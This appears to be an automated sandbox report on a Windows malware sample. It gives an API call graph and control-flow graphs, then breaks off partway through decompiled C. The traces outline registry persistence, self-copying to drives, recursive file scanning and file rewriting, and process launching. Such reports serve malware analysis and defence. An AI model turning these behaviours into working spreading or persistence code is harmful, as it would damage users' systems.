4085->4086 4087 40509e GetTickCount srand rand 4085->4087 4088 4050c6 GetTickCount srand rand 4086->4088 4089 4050df 6 API calls 4086->4089 4087->4086 4088->4089 4090 4051c0 rand rand 4089->4090 4091 40522a 4090->4091 4091->4090 4092 403c90 4091->4092 4093 404690 RegOpenKeyExA 4092->4093 4094 4046fa lstrlen RegSetValueExA RegCloseKey 4093->4094 4095 4046cc RegOpenKeyExA 4093->4095 4096 404741 4094->4096 4095->4094 4095->4096 4096->3992 4098 404948 RegSetValueExA RegCloseKey 4097->4098 4099 40491a RegOpenKeyExA 4097->4099 4100 40498a 4098->4100 4099->4098 4099->4100 4100->3994 4102 404d06 4101->4102 4103 404812 4 API calls 4102->4103 4104 404d16 GetLocalTime 4103->4104 4104->4057 4106 402170 4105->4106 4106->4106 4107 4021c0 _mbscat 4106->4107 4108 4021d6 4106->4108 4109 402280 4107->4109 4110 4021f2 4108->4110 4111 4021dc _mbscat 4108->4111 4109->4057 4112 4021f8 _mbscat 4110->4112 4113 40220b 4110->4113 4111->4109 4112->4109 4114 402211 _mbscat 4113->4114 4115 402224 4113->4115 4114->4109 4116 40222a _mbscat 4115->4116 4117 40223d 4115->4117 4116->4109 4118 402243 _mbscat 4117->4118 4119 402256 4117->4119 4118->4109 4120 40225c _mbscat 4119->4120 4121 40226f _mbscat 4119->4121 4120->4109 4121->4109 4122->4060 4124 403b01 4123->4124 4125 404620 5 API calls 4124->4125 4126 403b1b 4125->4126 4127 404620 5 API calls 4126->4127 4128 403b45 4127->4128 4146 40829c CreateFileA 4128->4146 4130 403b59 4131 404620 5 API calls 4130->4131 4145 403c33 4130->4145 4132 403b96 4131->4132 4133 40829c 24 API calls 4132->4133 4135 403bb0 4133->4135 4136 403bd3 4135->4136 4137 403bbb Sleep 4135->4137 4135->4145 4159 404f0a 4135->4159 4165 40396e RegOpenKeyExA 4136->4165 4137->4135 4141 403bdd 4142 404812 4 API calls 4141->4142 4143 403c15 4142->4143 4144 4048e2 4 API calls 4143->4144 4144->4145 4147 408300 CreateFileA 4146->4147 4148 40869e 4146->4148 4149 408353 CloseHandle 4147->4149 4150 408368 4147->4150 4148->4130 4149->4148 4176 40814c GetSystemTime 4150->4176 4154 4083f8 8 API calls 4155 4084fe ReadFile 4154->4155 4156 408535 4155->4156 4157 408577 7 API calls 4155->4157 4156->4157 4158 40853e WriteFile 4156->4158 4157->4148 4158->4155 4160 404c38 4159->4160 4161 404f24 GetModuleHandleA 4160->4161 4162 404f5d InternetGetConnectedState 4161->4162 4163 404f3e LoadLibraryA 4161->4163 4164 404f7b 4162->4164 4163->4162 4163->4164 4164->4135 4166 4039b1 memset RegQueryValueExA RegCloseKey 4165->4166 4167 403a32 4165->4167 4166->4167 4168 403a2a 4166->4168 4170 403a38 memset 4167->4170 4182 403390 CreateFileA 4168->4182 4171 403a8b 4170->4171 4172 403a9a GetDriveTypeA 4171->4172 4173 403ad8 4171->4173 4172->4171 4174 403aaa Sleep 4172->4174 4173->4141 4200 403790 4174->4200 4177 40816e 4176->4177 4178 4081d8 SetFilePointer 4177->4178 4179 408215 ReadFile 4178->4179 4180 40826f SetFilePointer 4179->4180 4181 40824c 4179->4181 4180->4154 4181->4179 4181->4180 4183 403618 4182->4183 4184 4033f8 GetFileSize CreateFileMappingA 4182->4184 4183->4167 4185 403480 MapViewOfFile 4184->4185 4186 403465 CloseHandle 4184->4186 4187 4034e3 4185->4187 4188 4034b7 CloseHandle CloseHandle 4185->4188 4186->4183 4189 403502 memset 4187->4189 4190 4035e6 UnmapViewOfFile CloseHandle CloseHandle 4187->4190 4191 404f0a 3 API calls 4187->4191 4192 40356b Sleep 4187->4192 4194 403595 CreateThread 4187->4194 4195 4035ca Sleep 4187->4195 4196 403008 4187->4196 4188->4183 4189->4187 4190->4183 4191->4187 4192->4187 4194->4195 4195->4187 4197 403022 4196->4197 4198 40303a 4196->4198 4197->4198 4199 403027 strstr 4197->4199 4198->4187 4199->4197 4199->4198 4201 40395f 4200->4201 4202 4037b7 4200->4202 4201->4171 4202->4201 4203 4037c8 _mbscpy 4202->4203 4204 403806 memset 4203->4204 4205 4037f7 4203->4205 4212 403845 4204->4212 4205->4204 4206 403849 FindFirstFileA 4206->4201 4206->4212 4207 40387b FindNextFileA 4208 403950 4207->4208 4207->4212 4208->4201 4209 403954 FindClose 4208->4209 4209->4201 4210 4038bc lstrcpy 4211 4038fd _mbscat 4210->4211 4210->4212 4211->4212 4212->4206 4212->4207 4212->4210 4212->4211 4213 403790 39 API calls 4212->4213 4215 403622 4212->4215 4213->4212 4216 403644 4215->4216 4217 403670 lstrcpyn CharLowerA 4216->4217 4218 403667 4216->4218 4219 40369c lstrcmp 4217->4219 4218->4219 4220 4036c2 lstrcmp 4219->4220 4221 403767 4219->4221 4220->4221 4223 4036dd lstrcmp 4220->4223 4232 402f2e CreateFileA 4221->4232 4223->4221 4225 4036f4 lstrcmp 4223->4225 4225->4221 4227 40370b lstrcmp 4225->4227 4226 403788 4226->4212 4227->4221 4229 403722 lstrcmp 4227->4229 4229->4221 4230 403739 lstrcmp 4229->4230 4230->4221 4231 403750 lstrcmp 4230->4231 4231->4221 4231->4226 4233 402fba 4232->4233 4234 402f8d GetFileSize 4232->4234 4233->4226 4237 40307e fopen 4233->4237 4235 402fa7 4234->4235 4236 402fab CloseHandle 4234->4236 4235->4236 4236->4233 4238 403388 4237->4238 4239 4030bb fgetc 4237->4239 4238->4226 4241 4030d0 fclose fopen 4239->4241 4241->4238 4246 4030fa 4241->4246 4242 403360 fgetc 4243 40337b fclose 4242->4243 4242->4246 4243->4238 4244 403115 ftell 4245 403127 fseek fgetc 4244->4245 4244->4246 4245->4246 4246->4242 4246->4243 4246->4244 4246->4245 4247 40314b fseek fgetc 4246->4247 4248 4030ff rewind 4246->4248 4250 403224 fgetc 4246->4250 4251 40324f lstrlen 4246->4251 4252 403008 strstr 4246->4252 4255 404f0a 3 API calls 4246->4255 4256 4032d6 Sleep 4246->4256 4257 4032ee CreateThread Sleep 4246->4257 4259 402fc2 lstrcmp 4246->4259 4262 40305a strchr 4246->4262 4247->4246 4249 40316f fclose 4247->4249 4248->4246 4249->4246 4250->4246 4251->4242 4251->4246 4252->4246 4255->4246 4256->4246 4257->4246 4258 403341 Sleep 4257->4258 4258->4246 4260 403000 4259->4260 4261 402fe8 lstrcpy 4259->4261 4260->4246 4261->4260 4262->4246 4775 40c000 TlsSetValue 4776 40c022 4775->4776 4777 40c026 GetLastError 4775->4777 4778 409400 4779 409418 4778->4779 4780 409230 ??3@YAXPAX 4779->4780 4781 409420 4780->4781 4782 401000 4783 401061 4782->4783 4784 40101e 4782->4784 4786 401025 4783->4786 4787 40102a signal 4783->4787 4789 401087 4783->4789 4785 401080 4784->4785 4784->4786 4785->4789 4790 4010e2 signal 4785->4790 4786->4787 4792 401071 4786->4792 4788 4010bb signal 4787->4788 4794 401041 4787->4794 4788->4794 4793 40108e signal 4789->4793 4789->4794 4791 401129 signal 4790->4791 4790->4794 4791->4794 4793->4794 4795 40110f signal 4793->4795 4795->4794 5377 409500 5378 4094a0 strcmp 5377->5378 5379 409518 5378->5379 4997 402288 lstrlen 4998 4022ba memset lstrcpy 4997->4998 5053 402f1d 4997->5053 4999 4022fd 4998->4999 5000 404620 5 API calls 4999->5000 5001 402317 5000->5001 5055 404eae GetTickCount srand rand 5001->5055 5003 402323 5056 404eae GetTickCount srand rand 5003->5056 5005 402362 7 API calls 5058 404eae GetTickCount srand rand 5005->5058 5006 40233f Sleep 5057 404eae GetTickCount srand rand 5006->5057 5009 402331 5009->5005 5009->5006 5010 402431 strstr 5011 40244d 5010->5011 5012 402459 5010->5012 5059 404eae GetTickCount srand rand 5011->5059 5014 402ecd 5012->5014 5016 402542 lstrcat 5012->5016 5017 402753 lstrcat lstrcat 5012->5017 5018 4025a5 lstrcat 5012->5018 5019 402608 lstrcat 5012->5019 5020 4027d8 lstrcat lstrcat 5012->5020 5021 40266b lstrcat 5012->5021 5022 40246e lstrcat 5012->5022 5023 4026ce lstrcat lstrcat 5012->5023 5024 4024df lstrcat lstrcat 5012->5024 5015 404f0a 3 API calls 5014->5015 5039 402ed6 5014->5039 5040 402ebe Sleep 5014->5040 5015->5014 5063 404eae GetTickCount srand rand 5016->5063 5069 404eae GetTickCount srand rand 5017->5069 5064 404eae GetTickCount srand rand 5018->5064 5065 404eae GetTickCount srand rand 5019->5065 5071 404eae GetTickCount srand rand 5020->5071 5066 404eae GetTickCount srand rand 5021->5066 5060 404eae GetTickCount srand rand 5022->5060 5067 404eae GetTickCount srand rand 5023->5067 5062 404eae GetTickCount srand rand 5024->5062 5034 402710 lstrcat 5068 404eae GetTickCount srand rand 5034->5068 5035 402521 lstrcat 5035->5014 5036 40256a lstrcat lstrcat 5036->5014 5037 402795 lstrcat 5070 404eae GetTickCount srand rand 5037->5070 5038 4025cd lstrcat lstrcat 5038->5014 5047 405ee8 128 API calls 5039->5047 5040->5014 5041 402630 lstrcat lstrcat 5041->5014 5042 40281a lstrcat 5072 404eae GetTickCount srand rand 5042->5072 5043 402496 lstrcat 5061 404eae GetTickCount srand rand 5043->5061 5044 402693 lstrcat lstrcat 5044->5014 5047->5053 5050 4024be lstrcat 5050->5014 5051 402738 lstrcat 5051->5014 5052 4027bd lstrcat 5052->5014 5054 402842 lstrcat 5054->5014 5055->5003 5056->5009 5057->5009 5058->5010 5059->5012 5060->5043 5061->5050 5062->5035 5063->5036 5064->5038 5065->5041 5066->5044 5067->5034 5068->5051 5069->5037 5070->5052 5071->5042 5072->5054 5565 40bf89 5566 40bf90 TlsFree 5565->5566 5567 40bfb0 GetLastError 5566->5567 5568 40bfab 5566->5568 5073 40a68c 5074 40a690 5073->5074 5075 40bed0 2 API calls 5074->5075 5076 40a699 5074->5076 5078 40a71c 5075->5078 5077 40a64e memset 5076->5077 5079 40c0e0 2 API calls 5076->5079 5080 40a430 66 API calls 5076->5080 5081 40b540 15 API calls 5077->5081 5078->5076 5082 40c080 3 API calls 5078->5082 5079->5076 5080->5076 5083 40a67c 5081->5083 5082->5076 5084 40aa8c 5085 40aaf0 5084->5085 5086 40aa9c 5084->5086 5087 4090a0 66 API calls 5085->5087 5088 40bb20 26 API calls 5086->5088 5095 40aa1e 5087->5095 5089 40aaab 5088->5089 5091 40ab0a InterlockedIncrement 5089->5091 5089->5095 5090 40aa66 5092 40b540 15 API calls 5090->5092 5091->5095 5093 40aa7b 5092->5093 5094 40a8b0 2 API calls 5094->5095 5095->5090 5095->5094 5096 40aa34 TlsGetValue SetLastError 5095->5096 5100 40a430 66 API calls 5095->5100 5096->5090 5097 40ab53 malloc 5096->5097 5097->5095 5098 40ab66 TlsSetValue 5097->5098 5098->5095 5099 40abba GetLastError 5098->5099 5099->5095 5100->5095 4827 402e0d lstrcat lstrcat 4838 404eae GetTickCount srand rand 4827->4838 4829 402e4f lstrcat 4839 404eae GetTickCount srand rand 4829->4839 4831 402e77 lstrcat lstrcat 4832 402ecd 4831->4832 4833 404f0a 3 API calls 4832->4833 4834 402ed6 4832->4834 4835 402ebe Sleep 4832->4835 4833->4832 4836 405ee8 128 API calls 4834->4836 4835->4832 4837 402f1d 4836->4837 4838->4829 4839->4831 5569 40bf90 TlsFree 5570 40bfb0 GetLastError 5569->5570 5571 40bfab 5569->5571 5380 408d19 5399 408c81 5380->5399 5381 409011 5383 40a430 66 API calls 5381->5383 5382 40905c 5384 40abd0 66 API calls 5382->5384 5388 40901d 5383->5388 5385 40906d 5384->5385 5389 40a3d0 66 API calls 5385->5389 5386 408940 2 API calls 5386->5399 5387 409085 5391 40abd0 66 API calls 5387->5391 5388->5387 5390 40ace0 66 API calls 5388->5390 5389->5387 5393 409047 5390->5393 5394 409093 5391->5394 5392 408730 abort 5392->5399 5395 40bb20 26 API calls 5393->5395 5396 40a430 66 API calls 5394->5396 5395->5382 5397 40909f 5396->5397 5398 40b540 15 API calls 5398->5399 5399->5381 5399->5382 5399->5386 5399->5388 5399->5392 5399->5398 5400 408ca7 5399->5400 5403 408a10 2 API calls 5399->5403 5404 408b00 2 API calls 5399->5404 5401 40b540 15 API calls 5400->5401 5402 408d08 5401->5402 5403->5399 5404->5399 4846 40bc1c 4847 40bc20 TlsSetValue 4846->4847 4848 40bb97 4847->4848 4849 40bc3b GetLastError 4847->4849 4848->4846 4849->4848 4850 40a81c 4851 40a820 ??3@YAXPAX 4850->4851 4852 40a82b 4851->4852 4853 40b540 15 API calls 4852->4853 4854 40a836 4853->4854 4855 406e1c LoadLibraryA 4856 406e6e GetProcAddress 4855->4856 4857 406f09 4855->4857 4858 406e8a FreeLibrary 4856->4858 4859 406e9c 4856->4859 4858->4857 4860 404620 5 API calls 4859->4860 4861 406eba DeleteFileA 4860->4861 4862 406ef7 Sleep 4861->4862 4862->4857 5411 406f1c LoadLibraryA 5412 407136 5411->5412 5413 406f6f GetProcAddress 5411->5413 5414 406fa0 GetSystemDirectoryA lstrlen 5413->5414 5415 406f8b FreeLibrary 5413->5415 5416 406fe1 5414->5416 5417 406fce lstrcat 5414->5417 5415->5412 5418 404f82 30 API calls 5416->5418 5417->5416 5419 406fec _mbscat 5418->5419 5420 407044 5419->5420 5426 401b7e malloc fopen 5420->5426 5423 407056 DeleteFileA 5423->5412 5424 40706b memset CreateProcessA 5424->5412 5425 407101 WaitForSingleObject CloseHandle DeleteFileA 5424->5425 5425->5412 5427 401bb8 5426->5427 5430 401bba 5426->5430 5428 401c00 5427->5428 5429 401bc7 realloc 5427->5429 5432 401c0f ??3@YAXPAX fclose 5428->5432 5429->5430 5431 401bda fread 5429->5431 5430->5423 5430->5424 5431->5428 5431->5429 5432->5430 5449 402d1f lstrcat lstrcat 5460 404eae GetTickCount srand rand 5449->5460 5451 402d61 lstrcat 5461 404eae GetTickCount srand rand 5451->5461 5453 402d89 lstrcat 5454 402ecd 5453->5454 5455 404f0a 3 API calls 5454->5455 5456 402ed6 5454->5456 5457 402ebe Sleep 5454->5457 5455->5454 5458 405ee8 128 API calls 5456->5458 5457->5454 5459 402f1d 5458->5459 5460->5451 5461->5453 5130 4068a0 memcpy 5131 4068e0 5130->5131 5132 404620 5 API calls 5131->5132 5133 406910 5132->5133 5134 404ed6 2 API calls 5133->5134 5139 406918 5134->5139 5135 4069fb 5136 406926 Sleep 5137 40693a GetDriveTypeA 5136->5137 5138 406955 memset _mbscat lstrlen 5137->5138 5137->5139 5140 40699b lstrcat 5138->5140 5141 4069ae _mbscat SetErrorMode CopyFileA 5138->5141 5139->5135 5139->5136 5139->5137 5140->5141 5141->5139 5462 409920 5463 4094a0 strcmp 5462->5463 5464 409947 5463->5464 5465 4094a0 strcmp 5464->5465 5466 40994b 5464->5466 5465->5466 5576 40a9a6 5577 40a9c1 5576->5577 5578 40a9b2 5576->5578 5580 40a9d0 5577->5580 5581 4090a0 66 API calls 5577->5581 5579 40bb20 26 API calls 5578->5579 5579->5577 5582 40b460 18 API calls 5580->5582 5581->5580 5586 40aa08 5582->5586 5583 40aa66 5584 40b540 15 API calls 5583->5584 5585 40aa7b 5584->5585 5586->5583 5588 40ab0a InterlockedIncrement 5586->5588 5591 40aa1e 5586->5591 5587 40aa34 TlsGetValue SetLastError 5587->5583 5589 40ab53 malloc 5587->5589 5588->5591 5589->5591 5592 40ab66 TlsSetValue 5589->5592 5590 40a8b0 2 API calls 5590->5591 5591->5583 5591->5587 5591->5590 5594 40a430 66 API calls 5591->5594 5592->5591 5593 40abba GetLastError 5592->5593 5593->5591 5594->5591 4876 405c2c GetModuleFileNameA 4881 405850 4876->4881 4882 405885 4881->4882 4883 4058ca RegOpenKeyExA 4882->4883 4884 405a30 4883->4884 4885 405905 RegQueryValueExA 4883->4885 4894 405a3e 4884->4894 4885->4884 4886 40594c RegCloseKey 4885->4886 4886->4884 4887 40596a lstrlen 4886->4887 4888 405992 lstrlen 4887->4888 4889 40597f lstrlen 4887->4889 4890 4059c0 4888->4890 4891 4059ad lstrcat 4888->4891 4889->4888 4907 404eae GetTickCount srand rand 4890->4907 4891->4890 4893 4059dd lstrcpy lstrcat CopyFileA 4893->4884 4893->4890 4895 405a73 4894->4895 4896 405ab8 RegOpenKeyExA 4895->4896 4897 405af3 RegQueryValueExA 4896->4897 4898 405c1e 4896->4898 4897->4898 4899 405b3a RegCloseKey 4897->4899 4899->4898 4900 405b58 lstrlen 4899->4900 4901 405b80 lstrlen 4900->4901 4902 405b6d lstrlen 4900->4902 4903 405b9b lstrcat 4901->4903 4904 405bae 4901->4904 4902->4901 4903->4904 4908 404eae GetTickCount srand rand 4904->4908 4906 405bcb lstrcpy lstrcat CopyFileA 4906->4898 4906->4904 4907->4893 4908->4906 5142 4098ae 5143 4098b0 5142->5143 5144 4098cd 5143->5144 5145 4094a0 strcmp 5143->5145 5146 4094a0 strcmp 5144->5146 5147 4098dc 5144->5147 5145->5144 5146->5147 5148 4098b0 5149 409900 5148->5149 5152 4098cd 5148->5152 5150 4094a0 strcmp 5149->5150 5150->5152 5151 4094a0 strcmp 5153 4098dc 5151->5153 5152->5151 5152->5153 5471 40a330 5472 409230 ??3@YAXPAX 5471->5472 5473 40a347 5472->5473 5474 402936 lstrcat 5487 404eae GetTickCount srand rand 5474->5487 5476 40295e lstrcat 5488 404eae GetTickCount srand rand 5476->5488 5478 402986 lstrcat 5489 404eae GetTickCount srand rand 5478->5489 5480 4029ae lstrcat 5481 402ecd 5480->5481 5482 404f0a 3 API calls 5481->5482 5483 402ed6 5481->5483 5484 402ebe Sleep 5481->5484 5482->5481 5485 405ee8 128 API calls 5483->5485 5484->5481 5486 402f1d 5485->5486 5487->5476 5488->5478 5489->5480 5602 402bba lstrcat lstrcat 5623 404eae GetTickCount srand rand 5602->5623 5604 402bfc 5605 402c00 5604->5605 5606 402c71 5604->5606 5624 404eae GetTickCount srand rand 5605->5624 5626 404eae GetTickCount srand rand 5606->5626 5609 402c0c lstrcat 5625 404eae GetTickCount srand rand 5609->5625 5610 402c7d lstrcat 5627 404eae GetTickCount srand rand 5610->5627 5613 402c34 lstrcat lstrcat 5615 402ce0 5613->5615 5614 402ca5 lstrcat lstrcat 5614->5615 5616 404620 5 API calls 5615->5616 5617 402d10 5616->5617 5618 404f0a 3 API calls 5617->5618 5619 402ed6 5617->5619 5620 402ebe Sleep 5617->5620 5618->5617 5621 405ee8 128 API calls 5619->5621 5620->5617 5622 402f1d 5621->5622 5623->5604 5624->5609 5625->5613 5626->5610 5627->5614 5628 40bfbc 5629 40bfc0 GetLastError TlsGetValue SetLastError 5628->5629

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 161 403790-4037b1 162 403964-40396d 161->162 163 4037b7-4037c2 161->163 163->162 164 4037c8-4037f5 _mbscpy 163->164 165 403806-403840 memset 164->165 166 4037f7-4037ff 164->166 167 403845-403847 165->167 166->165 168 403849-403873 FindFirstFileA 167->168 169 40387b-403892 FindNextFileA 167->169 170 403879 168->170 171 40395f 168->171 172 403950-403952 169->172 173 403898-40389f 169->173 170->173 171->162 172->171 174 403954-40395c FindClose 172->174 175 4038a1-4038a8 173->175 176 4038bc-4038ec lstrcpy 173->176 174->171 175->167 177 4038aa-4038b1 175->177 178 4038fd-40391c _mbscat 176->178 179 4038ee-4038f6 176->179 177->176 180 4038b3-4038ba 177->180 181 403933-40394b call 403622 178->181 182 40391e-403929 call 403790 178->182 179->178 180->167 180->176 181->167 185 40392e 182->185 185->167
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Find$File$CloseFirstNext_mbscat_mbscpylstrcpymemset
                                                                          • String ID: *.*$.$.$C:\$\
                                                                          • API String ID: 1316374366-389428931
                                                                          • Opcode ID: 6bb881a1093a1ff426846c50c2e3e695106a01521adaf6e845e5a118fa89989f
                                                                          • Instruction ID: b4465dfa5f332ec533157c87ff7dca4d317d8e0d8912ef682c4f4d402bf95f8b
                                                                          • Opcode Fuzzy Hash: 6bb881a1093a1ff426846c50c2e3e695106a01521adaf6e845e5a118fa89989f
                                                                          • Instruction Fuzzy Hash: 505194758083588ADB20AF35C48839DBFE5AF44315F1486BEE859673C1DB788F88CB46
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 26%
                                                                          			E0040447C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                          				void* _v12;
                                                                          				void _v28;
                                                                          				long* _v32;
                                                                          				void* _v36;
                                                                          				char _v40;
                                                                          				char _v44;
                                                                          				int _v60;
                                                                          				int _v64;
                                                                          				int _v68;
                                                                          				int _v72;
                                                                          				char* _v76;
                                                                          				int _v80;
                                                                          				int _v84;
                                                                          				intOrPtr _v88;
                                                                          				int _v100;
                                                                          				intOrPtr _v104;
                                                                          				intOrPtr _v108;
                                                                          				int _v112;
                                                                          				char* _v116;
                                                                          				char* _v120;
                                                                          				intOrPtr _v124;
                                                                          				int _v128;
                                                                          				int _v132;
                                                                          				char* _v136;
                                                                          				void* _v140;
                                                                          				intOrPtr _v144;
                                                                          				signed int _v168;
                                                                          				intOrPtr _v172;
                                                                          				int _t54;
                                                                          				long* _t57;
                                                                          				int _t60;
                                                                          				intOrPtr _t76;
                                                                          				int _t79;
                                                                          				signed int _t82;
                                                                          				void* _t83;
                                                                          				intOrPtr* _t86;
                                                                          				void* _t88;
                                                                          				void* _t89;
                                                                          				intOrPtr* _t90;
                                                                          				intOrPtr* _t93;
                                                                          
                                                                          				_t76 = _a12;
                                                                          				asm("cld");
                                                                          				memset( &_v28, 0, 4 << 2);
                                                                          				_v60 = 0;
                                                                          				_v64 = 1;
                                                                          				_v68 = 0;
                                                                          				_v72 = 0;
                                                                          				_t54 = CryptAcquireContextA( &_v32); // executed
                                                                          				_t86 = _t83 - 0x40 + 0xc - 0x14;
                                                                          				_t79 = 0;
                                                                          				if(_t54 != 0) {
                                                                          					_v76 =  &_v36;
                                                                          					_v80 = 0;
                                                                          					_v84 = 0;
                                                                          					_v88 = 0x8003;
                                                                          					_t57 = _v32;
                                                                          					 *_t86 = _t57;
                                                                          					L0040C4B0();
                                                                          					_t88 = _t86 - 0x14;
                                                                          					_t79 = 0;
                                                                          					if(_t57 != 0) {
                                                                          						_v100 = 0;
                                                                          						_v104 = _a8;
                                                                          						_v108 = _a4;
                                                                          						_t60 = _v36;
                                                                          						_v112 = _t60;
                                                                          						L0040C4B8();
                                                                          						_t89 = _t88 - 0x10;
                                                                          						if(_t60 != 0) {
                                                                          							_v40 = 4;
                                                                          							_v112 = 0;
                                                                          							_v116 =  &_v40;
                                                                          							_v120 =  &_v44;
                                                                          							_v124 = 4;
                                                                          							_v128 = _v36;
                                                                          							L0040C4D0();
                                                                          							_t90 = _t89 - 0x14;
                                                                          							_v132 = 0;
                                                                          							_v136 =  &_v44;
                                                                          							_v140 =  &_v28;
                                                                          							_v144 = 2;
                                                                          							 *_t90 = _v36;
                                                                          							L0040C4D0();
                                                                          							_v168 = _v36;
                                                                          							L0040C4C0();
                                                                          							_v168 = 0;
                                                                          							CryptReleaseContext(_v32);
                                                                          							_t93 = _t90 - 8;
                                                                          							_t82 = 0;
                                                                          							if(0 < _v44) {
                                                                          								do {
                                                                          									_v168 =  *( &_v28 + _t82) & 0x000000ff;
                                                                          									_v172 = "%2.2x";
                                                                          									 *_t93 = _t76 + _t82 * 2;
                                                                          									sprintf(??, ??);
                                                                          									_t82 = _t82 + 1;
                                                                          								} while (_t82 < _v44);
                                                                          							}
                                                                          							_t79 = 1;
                                                                          						} else {
                                                                          							_v128 = _v36;
                                                                          							L0040C4C0();
                                                                          							_v128 = 0;
                                                                          							CryptReleaseContext(_v32);
                                                                          							_t79 = 0;
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				return _t79;
                                                                          			}











































                                                                          0x00404484
                                                                          0x0040448a
                                                                          0x00404495
                                                                          0x00404497
                                                                          0x0040449f
                                                                          0x004044a7
                                                                          0x004044af
                                                                          0x004044bd
                                                                          0x004044c2
                                                                          0x004044c5
                                                                          0x004044cc
                                                                          0x004044d5
                                                                          0x004044d9
                                                                          0x004044e1
                                                                          0x004044e9
                                                                          0x004044f1
                                                                          0x004044f4
                                                                          0x004044f7
                                                                          0x004044fc
                                                                          0x004044ff
                                                                          0x00404506
                                                                          0x0040450c
                                                                          0x00404517
                                                                          0x0040451e
                                                                          0x00404522
                                                                          0x00404525
                                                                          0x00404528
                                                                          0x0040452d
                                                                          0x00404532
                                                                          0x00404562
                                                                          0x00404569
                                                                          0x00404574
                                                                          0x0040457b
                                                                          0x0040457f
                                                                          0x0040458a
                                                                          0x0040458d
                                                                          0x00404592
                                                                          0x00404595
                                                                          0x004045a0
                                                                          0x004045a7
                                                                          0x004045ab
                                                                          0x004045b6
                                                                          0x004045b9
                                                                          0x004045c4
                                                                          0x004045c7
                                                                          0x004045cf
                                                                          0x004045dd
                                                                          0x004045e2
                                                                          0x004045e5
                                                                          0x004045ed
                                                                          0x004045ef
                                                                          0x004045f4
                                                                          0x004045f8
                                                                          0x00404603
                                                                          0x00404606
                                                                          0x0040460b
                                                                          0x0040460c
                                                                          0x004045ef
                                                                          0x00404611
                                                                          0x00404534
                                                                          0x00404537
                                                                          0x0040453a
                                                                          0x00404542
                                                                          0x00404550
                                                                          0x00404558
                                                                          0x00404558
                                                                          0x00404532
                                                                          0x00404506
                                                                          0x0040461e

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.280268095.0000000000401000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.280247027.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280559030.0000000000419000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280572210.000000000041C000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280598300.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280615823.0000000000423000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280797442.0000000000425000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280817023.0000000000429000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280970732.000000000042D000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.280982620.0000000000431000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281015199.0000000000435000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281031045.0000000000436000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                          • Associated: 00000001.00000002.281037174.0000000000437000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_smnss.jbxd
                                                                          Similarity
                                                                          • API ID: Crypt$Hash$Context$DestroyParamRelease$AcquireCreateDatasprintf
                                                                          • String ID: %2.2x
                                                                          • API String ID: 3563044075-341615062
                                                                          • Opcode ID: c977df23211e434dc7ae6194df0722f08c56245aff09abc11c4fb2b5cff81619
                                                                          • Instruction ID: 71e90cb579b3012189f1bc8fcce2ad08a11f5a443b18af0431ecfa41047fce4e
                                                                          • Opcode Fuzzy Hash: c977df23211e434dc7ae6194df0722f08c56245aff09abc11c4fb2b5cff81619
                                                                          • Instruction Fuzzy Hash: 6A41A6B5904309DBDB00EF69C58579EBBF4BB84314F00892EE984A7381E779D548CFA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          C-Code - Quality: 82%
                                                                          			E00401149() {
                                                                          				char _v12;
                                                                          				char _v16;
                                                                          				char* _v32;
                                                                          				intOrPtr _v36;
                                                                          				char _v40;
                                                                          				char _v44;
                                                                          				intOrPtr _t20;
                                                                          				char _t23;
                                                                          				intOrPtr* _t25;
                                                                          				_Unknown_base(*)()* _t34;
                                                                          				void* _t36;
                                                                          				void* _t37;
